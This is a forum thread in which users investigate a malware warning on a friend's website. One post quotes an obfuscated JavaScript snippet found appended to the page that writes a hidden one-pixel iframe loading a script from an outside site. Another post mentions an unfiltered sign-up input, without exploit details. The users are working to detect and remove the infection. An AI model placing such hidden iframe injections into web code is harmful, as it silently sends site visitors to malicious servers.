VideoHelp Forum

Try DVDFab and copy Ultra HD Blu-rays and DVDs! Or rip iTunes movies and music! Download free trial !
+ Reply to Thread
Results 1 to 10 of 10
Thread
  1. Member hech54's Avatar
    Join Date
    Jul 2001
    Location
    Yank in Europe
    Search Comp PM
    Click image for larger version

Name:	screenshot2.jpg
Views:	261
Size:	37.1 KB
ID:	453
    Has anyone heard of the "barracudass.in" thing listed here on this warning?
    I can't find a damn thing about it anywhere.
    It's also showing up as blocked in NoScript (I use Firefox obviously).
    It's showing up when people visit my friend's website....but his webmistress is basically
    blowing it off as "scan YOUR computer for a virus or buy a Mac like I have".
    Why are so many webmasters arrogant idiots?

    The kicker is....my friend (who's website this is) is in India right now....".in"?
    Coincidence?....I think not.

    Thanks
    Quote Quote  
  2. Member
    Join Date
    Mar 2004
    Location
    London
    Search Comp PM
    There is a link or ad on this website that directs to malicious website 'barracudasss' which has infected domains.
    This is what google has to say about it >
    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US...rracudasss.in/
    Quote Quote  
  3. Member hech54's Avatar
    Join Date
    Jul 2001
    Location
    Yank in Europe
    Search Comp PM
    Thank You for the info.
    Does that mean there was secretly something placed on my friend's website without
    anyone's knowledge?
    Quote Quote  
  4. Member isogonic's Avatar
    Join Date
    Jan 2003
    Location
    @localhost
    Search Comp PM
    secretly something placed on my friend's website without
    anyone's knowledge?
    Yes its possible. Legit websites can unknowingly host malicious code or contain a hidden redirect.

    webmasters arrogant idiots
    websites are very easy to make, no need to know much about it. Just like running a computer thats never updated or patched
    Quote Quote  
  5. Well, your friends webmaster was warned about a specific, existing infection and blew it off. I would tell her to get her Mac out of her ass and solve the problem, plus SHOW YOU the infectious code and the specific change made to remove it.

    Then, take your business elsewhere. It is quite possible the infection was not accidental, the web-ass knew about it, and may have been profiting from it. Either way, not a service worth paying for.
    Quote Quote  
  6. aBigMeanie aedipuss's Avatar
    Join Date
    Oct 2005
    Location
    666th portal
    Search Comp PM
    what's your friend's site? we can look at the source and try to find the re-direct. i'd guess the entire web server is "owned" and she doesn't even know.
    --
    "a lot of people are better dead" - prisoner KSC2-303
    Quote Quote  
  7. Banned
    Join Date
    Jun 2004
    Location
    ®Inside My Avatar™© U.S.
    Search Comp PM
    Originally Posted by aedipuss View Post
    what's your friend's site? we can look at the source and try to find the re-direct. i'd guess the entire web server is "owned" and she doesn't even know.
    Yep....

    Last week i had 3 friends ask why i sent some messed up link to them through facebook....
    I never did!!!!
    I had not even been on facebook in a couple of weeks and when i looked, sure as $h!t it showed i had sent a bunch of people links when i did not.

    And when i tried to look at the link i "supposedly" sent, facebook blocked it saying something like it was not safe.

    So evidently someone hacked facebook and was sending crap out through it.
    Quote Quote  
  8. aBigMeanie aedipuss's Avatar
    Join Date
    Oct 2005
    Location
    666th portal
    Search Comp PM
    the only sketchy code that is not documented at all on that page is this - but i can't make out what it does??? anyone?
    "script language=JavaScript>document.write(unescape('%3ci% 66rame w%69'+'dth%3d1 h%65ight%3d1 b%6frder=0%20fram%65border=%30 src=%27htt%70://'+'thedisco%76er.c%6fm/%73t%64%2fg%6f%2ephp?sid=1%27%3e'+'%3c/ifra%6de%3e%0d%0a'))</script"
    the rest of the page is well written, this appears to have been added at the end of the code. the quotes are mine.
    --
    "a lot of people are better dead" - prisoner KSC2-303
    Quote Quote  
  9. Member hech54's Avatar
    Join Date
    Jul 2001
    Location
    Yank in Europe
    Search Comp PM
    The page was professionally written by (most likely)someone hired by a record label....then control of the new content and message board stuff was handed over to the web master. Thank you for the help aedipuss.
    Quote Quote  
  10. aBigMeanie aedipuss's Avatar
    Join Date
    Oct 2005
    Location
    666th portal
    Search Comp PM
    the source is well written for the most part. there is an easy way to hack the site though, it has an unfiltered input statement on the sign up page that could be exploited.
    --
    "a lot of people are better dead" - prisoner KSC2-303
    Quote Quote  



Similar Threads